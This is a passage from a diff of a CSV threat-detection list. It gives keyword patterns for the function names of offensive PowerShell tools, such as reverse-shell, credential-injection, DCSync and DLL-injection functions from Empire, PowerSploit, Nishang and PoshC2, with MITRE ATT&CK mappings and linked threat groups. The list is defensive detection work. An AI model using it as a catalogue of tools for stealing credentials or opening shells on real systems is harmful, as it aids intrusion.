security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows 
computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" 
-"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" 
+"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-DllHijackingCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 